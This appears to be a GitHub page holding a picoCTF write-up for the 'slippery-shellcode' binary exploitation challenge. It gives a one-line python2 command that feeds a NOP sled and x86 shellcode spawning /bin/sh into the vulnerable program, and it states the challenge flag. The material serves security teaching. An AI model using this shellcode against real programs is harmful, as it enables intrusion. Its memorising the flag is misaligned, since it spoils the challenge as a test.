Skip to content

Latest commit

 

History

History

slippery-shellcode

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
 
 
 
 
 
 

slippery-shellcode

Binary Exploitation - Points: 200

This program is a little bit more tricky. Can you spawn a shell and use that to read the flag.txt?

vuln

vuln.c

The binary directly asks for a shellcode as input, so get x86 shellcode, for example this.

The buffer with the shellcode is executed with a random offset, so add a NOP-slide before the shellcode.

(python2 -c 'print("\x90"*256+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"+"\x90"*256)'; cat) | ./vuln

flag: picoCTF{sl1pp3ry_sh311c0d3_0fb0e7da}